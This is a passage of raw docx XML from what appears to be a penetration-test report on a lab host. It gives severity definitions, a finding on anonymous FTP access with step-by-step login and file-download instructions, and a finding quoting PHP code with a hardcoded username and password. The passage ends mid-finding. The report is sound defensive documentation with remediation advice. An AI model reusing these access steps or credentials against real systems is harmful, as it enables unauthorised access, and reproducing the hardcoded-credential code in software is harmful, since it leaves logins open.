                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A6F5D3C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="640D06FC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C1A3EC3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35E66DBF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Directly leads to full system compromise or unauthenticated remote code execution with minimal effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="4FC2E851" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62D1E024" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2890A2D1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Significant impact </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> confidentiality, integrity, or availability; may lead to compromise with limited additional effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="21E258BE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="035754B4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="485938BC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moderate impact; typically requires specific conditions or chaining with other issues to realize significant impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="2686DBB0" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03733FB4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="775F8539" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Limited impact on its own; primarily informational or defense-in-depth relevant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="15C39E8C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EA6ABB5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B15FE24" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No direct security impact; noted for completeness or hardening purposes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CA610E4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-01 — Anonymous FTP Access / Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2BEDD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
        </w:rPr>
        <w:t>MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-287 (Improper Authentication) / CWE-200 (Information Exposure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0FB6D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>FTP service — 192.168.76.157:21 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3.0.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A67F5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2CFEF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The FTP service running on port 21 permits anonymous login without a valid username or password. Once authenticated anonymously, the FTP root directory listing exposed a file named webpass.txt, which was downloaded and found to contain a large password-style wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FEAED" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53845D8A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Anonymous FTP login succeeded using the username "anonymous" with no meaningful password check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18055000" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The directory listing (ls -la) exposed a single readable file: webpass.txt (5,956 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAD3D0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The file was downloaded successfully and reviewed. It contains a large list of password-style strings, one of which — KeepR3ading@B00ks — is application-specific and relevant to the target (see F-02).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC94CC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E545D4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Connect to the FTP service: ftp 192.168.76.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4A92F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Authenticate with username "anonymous" and any password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB61BE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>List the directory contents (ls -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> webpass.txt is visible and world-readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13717EA2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Download the file (get webpass.txt) and review its contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0413C0B5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4878B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The figure below shows the anonymous FTP session, successful download of webpass.txt, and the specific application-relevant entry identified within it via grep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860A447" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D096482" wp14:editId="4C61ADC9">
            <wp:extent cx="59055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143250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B2E41" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 1. Anonymous FTP login, successful download of webpass.txt, and the application-specific credential entry (line 528) recovered via grep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A5420" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA014E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Anonymous access to FTP allows any unauthenticated network user to browse and download files placed on the service, without any audit trail tied to an individual identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110D138" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In this case, the exposed file contained a credential fragment relevant to the web application (see F-02), which materially assisted in constructing a plausible list of application-related terms; note that the wordlist itself does not on its own prove a valid credential — validity was separately confirmed against the login endpoint in F-02.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3740E9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2163E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This finding is rated Medium rather than higher because the FTP service does not, by itself, expose privileged system access, and the file discovered required correlation with other findings (source code disclosure in F-02) to have significant impact. It is nonetheless a meaningful information-disclosure and authentication-hygiene issue that should be remediated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC1C11" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2DA652" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Disable anonymous FTP access; require authenticated access only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54527214" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Remove sensitive or password-related files from any publicly or anonymously accessible service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF3E62" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Periodically audit files exposed via FTP and other file-sharing services for sensitive content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A391CA0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-02 — Hardcoded Credentials in PHP Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C1D0A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-798 (Use of Hard-coded Credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2C639" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>/root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meaco</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (server-side source, disclosed via directory/file enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B5E63" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0C21A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The server-side source code for the application's login page (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) contains a hardcoded username/password check rather than validating credentials against a database or other authoritative store. The disclosed credentials were confirmed valid by submitting them directly to the login endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18431386" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6050B85F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The relevant source code is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDF34D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>$user = $_POST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B7BD4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>$pass = $_POST['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A7053" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$user=="username" &amp;&amp; $pass=="KeepR3ading@b00ks</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>"){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20F3E0D1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>echo("success"); // redirects to /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/admin/B00kYouRProFile.php</w:t>
      </w:r>
    </w:p>
